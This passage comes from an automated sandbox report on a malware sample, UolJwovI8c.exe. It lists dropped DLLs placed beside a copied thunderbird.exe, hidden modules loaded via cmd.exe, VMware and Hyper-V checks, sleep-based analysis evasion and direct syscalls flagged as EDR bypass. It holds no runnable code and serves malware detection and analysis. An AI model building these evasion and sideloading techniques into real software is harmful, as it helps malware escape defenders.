Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldap32v50.dll	Jump to dropped file

Source: C:\Users\user\Desktop\UolJwovI8c.exe	File created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\js3250.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\ssl3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\Trombone.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldap32v50.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\idrccptxisabu			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ekxwihvmv			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\IDRCCPTXISABU
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EKXWIHVMV

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	API/Special instruction interceptor: Address: 6C5B7C44
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	API/Special instruction interceptor: Address: 6D0A7C44
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	API/Special instruction interceptor: Address: 6D0A7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6D0A3B54

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\idrccptxisabu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ekxwihvmv	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Dropped PE file which has not been started: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\Trombone.dll	Jump to dropped file

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

API coverage: 6.0 %

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe TID: 7084	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe TID: 5044	Thread sleep time: -90000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 005CFF61h	0_2_005CFEC6
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 005CFF5Ah	0_2_005CFEC6
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0054FF61h	2_2_0054FEC6
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0054FF5Ah	2_2_0054FEC6

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_00593CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	0_2_00593CC4
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005D4440 FindFirstFileW,FindClose,	0_2_005D4440
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005A9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	0_2_005A9B43
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C7B87 FindFirstFileExW,	0_2_005C7B87
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00554440 FindFirstFileW,FindClose,	2_2_00554440
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00529B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_00529B43
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00547B87 FindFirstFileExW,	2_2_00547B87
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00513CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00513CC4

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005D97A5 VirtualQuery,GetSystemInfo,

0_2_005D97A5

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2800043144.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2778410174.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2779003861.0000000000497000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWN
Source: Qjsync.exe, 0000000C.00000002.2990103682.000000000041C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@6J%SystemRoot%\system32\mswsock.dll
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2800043144.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2778410174.0000000000497000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2779003861.0000000000497000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0

Source: C:\Users\user\Desktop\UolJwovI8c.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005BE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_005BE88A

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

2_2_1006FAB0

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C48D8 mov eax, dword ptr fs:[00000030h]		0_2_005C48D8
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_005448D8 mov eax, dword ptr fs:[00000030h]		2_2_005448D8

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_0059394F GetProcessHeap,RtlAllocateHeap,

0_2_0059394F

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005BE3D8
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005BE88A
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BE9DC SetUnhandledExceptionFilter,	0_2_005BE9DC
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005C3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005C3C76
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0053E3D8
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0053E88A
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053E9DC SetUnhandledExceptionFilter,	2_2_0053E9DC
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00543C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00543C76
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_100671C9 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_100671C9
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_1006386B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1006386B
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10064BBF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10064BBF

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6CCA55415	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCB86DD8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationThread: Direct from: 0x7FF6A87ADC7C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCA476C3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	NtSetInformationThread: Direct from: 0x60379479	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6A8755415	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FF6CCAADC7C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A87476C3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6A875C76E
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6A875BF72	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCBF3D9E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6CCA7C365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6A88E931E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6CCA5C76E
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCAB5E4F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6CCA5BF72	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCB8AFF7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6CCA7C754	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A88EA95C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A86998FA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCBF2440	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCBEA95C	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6CCBE931E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateThreadEx: Direct from: 0x7FF6CC9959F0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6CCA5BD87	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6A877C754	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCAB1A29	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6CCBEBBD1
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtOpenKeyEx: Direct from: 0x7FF6CCA7B377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCAB5D54	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6CCBEBBC3
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6CCA5D041	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCAF1235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6A877C365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateThreadEx: Direct from: 0x7FF6A86959F0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCA3C626	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCB82D0F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6CCA4C661	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCAE9B86	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6CCA7C853	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCA5563F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6CCBE6553	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadVirtualMemory: Direct from: 0x7FF6CCBE61EF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCA5A04A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCA47BBB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	NtQuerySystemInformation: Direct from: 0x76230BD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6A87E2B0B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FF6CCA78460	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadFile: Direct from: 0x7FF6A875569C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCBED365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadFile: Direct from: 0x7FF6CCA5569C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6A877C853	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6A88ED365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A8695592	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCA4C242	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtMapViewOfSection: Direct from: 0x7FF6A88EA52E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CC9998FA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6A88EBBAF
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6CCBEBBAF
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCAB069F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FF6CCAED98F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FFDB4404B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCBEA52E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCB84F15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtRequestWaitReplyPort: Direct from: 0x7FF6CCAE9D6B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtOpenKeyEx: Direct from: 0x7FF6A877B377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6CCA7BDFA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6CCBF3E76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtDeviceIoControlFile: Direct from: 0x7FF6A87B4392	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtDeviceIoControlFile: Direct from: 0x7FF6CCAB4392	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A874C242	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCB846A3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6A87B1C63
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6A88EBBD1
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationThread: Direct from: 0x7FF6A87B1A29	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
